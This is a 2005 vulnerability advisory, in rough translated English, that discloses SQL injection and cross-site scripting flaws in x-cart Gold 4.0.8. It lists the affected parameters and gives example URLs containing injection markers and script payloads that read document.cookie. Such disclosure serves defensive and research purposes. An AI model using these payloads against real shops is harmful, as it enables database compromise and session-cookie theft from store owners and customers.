SVadvisory#7 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Title: Multiple vulnerabilities in x-cart Gold The program: x-cart Gold The vulnerable version: 4.0.8 Homepage: www.x-cart.com Vulnerability is found: 29.05.05 Has found: CENSORED / SVT / www.svt.nukleon.us ===================================================================== The description. SQL - injections --------------- At research of a product the set Multiple vulnerabilities was revealed SQL-Injections. Vulnerability mentions practically all parameters. The first mistake has been found in parameter "cat". In a script There is no check of this parameter and at substitution of a symbol "'" Probably, to make SQL-an injection. Further the mistake has been found in Parameter "productid" as from - for absence of check on Special symbols, by transfer to this parameter of a symbol "'" occurs Mistake SQL, and script forwards automatically on page Speaking about a mistake. On this page the parameter "id" is visible to it We transfer a symbol "'" and as probably to make SQL - an injection. Further we look parameter "mode", at substitution Special symbols There is a mistake and probably to make SQL - an injection. We shall wound And parameter "section" in it it is possible to make SQL - an injection. XSS --------------- Vulnerability of type XSS can make in the same parameters as at mistakes SQL - injections ===================================================================== Example ^^^^^^^^^ SQL - injections --------------- http://example/home.php?cat='[SQL-inj] http://example/home.php?printable='[SQL-inj] http://example/product.php?productid='[SQL-inj] http://example/product.php?mode='[SQL-inj] http://example/error_message.php?access_denied&id='[SQL-inj] http://example/help.php?section='[SQL-inj] http://example/orders.php?mode='[SQL-inj] http://example/register.php?mode='[SQL-inj] http://example/search.php?mode='[SQL-inj] http://example/giftcert.php?gcid='[SQL-inj] http://example/giftcert.php?gcindex='[SQL-inj] XSS --------------- http://example/home.php?cat='><script>alert(document.cookie)</script> http://example/home.php?printable='><script>alert(document.cookie)</script> http://example/product.php?productid='><script>alert(document.cookie)</script> http://example/product.php?mode='><script>alert(document.cookie)</script> http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script> http://example/help.php?section='><script>alert(document.cookie)</script> http://example/orders.php?mode='><script>alert(document.cookie)</script> http://example/register.php?mode='><script>alert(document.cookie)</script> http://example/search.php?mode='><script>alert(document.cookie)</script> http://example/giftcert.php?gcid='><script>alert(document.cookie)</script> http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script> ===================================================================== The conclusion. ^^^^^^^^^^^ Researches made only on version 4.0.8. Other versions as Can be vulnerable. The manufacturer in popularity is put. If is What that remarks write on censored@mail.ru ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Search Vulnerabilities Team / www.svt.nukleon.us / CENSORED | Cash | Fredy | patr0n | Loader | ___ ___ / / ____________\__\___ / / | _______________// _/_ ____|__________ |\ \/ | | /__________________| \____/ | ___| |___ |___ ___| | |___ |_______|